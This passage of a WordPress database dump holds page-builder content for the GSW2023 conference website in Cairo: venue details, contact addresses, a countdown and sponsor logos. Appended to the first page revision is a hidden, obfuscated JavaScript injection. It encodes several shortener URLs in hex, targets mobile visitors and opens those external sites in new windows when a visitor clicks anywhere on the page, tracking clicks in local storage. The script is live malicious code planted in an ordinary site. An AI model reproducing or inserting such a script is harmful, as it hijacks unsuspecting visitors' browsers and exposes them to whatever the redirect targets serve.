img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 12:27:17','2023-08-13 12:27:17','',3066,'https://gsw2023.com/?p=5112',0,'revision','',0),
(5113,1,'2023-08-13 12:28:36','2023-08-13 12:28:36','<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #0000ff;\"><strong>Under the auspices of </strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h1>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>           Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More 